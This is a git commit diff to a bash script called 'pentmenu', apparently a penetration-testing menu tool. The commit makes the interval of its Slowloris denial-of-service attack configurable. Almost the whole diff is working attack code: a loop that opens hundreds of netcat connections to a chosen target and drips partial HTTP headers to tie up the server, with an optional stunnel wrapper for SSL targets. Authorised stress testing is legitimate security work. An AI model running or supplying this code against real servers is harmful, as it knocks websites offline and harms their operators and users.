Slowloris interval is now configurable
default interval between sending each header line is now between 5 and 15 seconds, or can be configured by user.

diff --git a/pentmenu b/pentmenu
--- a/pentmenu
+++ b/pentmenu
@@ -101,10 +101,22 @@ echo "Enter number of connections to open (default 500):"
 CONNS=500 && echo "Invalid integer!  Using 500 connections"
 	fi
 
+echo "Choose interval between sending headers."
+echo "Default is [r]andom, between 5 and 15 seconds, or enter interval in seconds:"
+	read INTERVAL
+	: ${INTERVAL:=r}
+	if [[ "$INTERVAL" = "r" ]]
+then
+INTERVAL=$((RANDOM % 11 + 5))
+	elif ! [[ "$INTERVAL" =~ ^[0-9]+$ ]] && ! [[ "$INTERVAL" = "r" ]]
+then
+INTERVAL=$((RANDOM % 11 + 5)) && echo "Invalid integer!  Using random value between 5 and 15 seconds"
+	fi
+
 echo "use SSL? [y]es or [n]o (default):"
 	read SSL
 	: ${SSL:=n}
-if [[ $SSL = y ]]
+if [[ "$SSL" = "y" ]]
 	then echo "Using SSL/TLS"
 LHOST=127.0.0.1
 LPORT=9991
@@ -118,7 +130,7 @@ if test -f "/bin/ss"; then
 	else LISTPORT=netstat
 fi
 $LISTPORT -tln |grep -q $LPORT
-if [[ $? = 1 ]]
+if [[ "$?" = "1" ]]
 then
 	echo "Creating stunnel on $LHOST:$LPORT"	
 		sudo rm -f /etc/stunnel/pentmenu.conf;
@@ -135,14 +147,14 @@ fi
 echo "Launching Slowloris....Use 'Ctrl c' to exit prematurely" && sleep 1
 	i=1
 	while [ "$i" -le "$CONNS" ]; do
-echo "Slowloris attack ongoing...this is connection $i"; echo -e "GET / HTTP/1.1\r\nHost: $TARGET\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i 59 -w 30000 $LHOST $LPORT  2>/dev/null 1>/dev/null & i=$((i + 1)); done
+echo "Slowloris attack ongoing...this is connection $i, interval is $INTERVAL seconds"; echo -e "GET / HTTP/1.1\r\nHost: $TARGET\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $LHOST $LPORT  2>/dev/null 1>/dev/null & i=$((i + 1)); done
 echo "Opened $CONNS connections....returning to menu"
 
 else 
 echo "Launching Slowloris....Use 'Ctrl c' to exit prematurely" && sleep 1
 	i=1
 	while [ "$i" -le "$CONNS" ]; do
-echo "Slowloris attack ongoing...this is connection $i"; echo -e "GET / HTTP/1.1\r\nHost: $TARGET\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i 59 -w 30000 $TARGET $PORT  2>/dev/null 1>/dev/null & i=$((i + 1)); done
+echo "Slowloris attack ongoing...this is connection $i, interval is $INTERVAL seconds"; echo -e "GET / HTTP/1.1\r\nHost: $TARGET\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $TARGET $PORT  2>/dev/null 1>/dev/null & i=$((i + 1)); done
 echo "Opened $CONNS connections....returning to menu"
 fi
 }
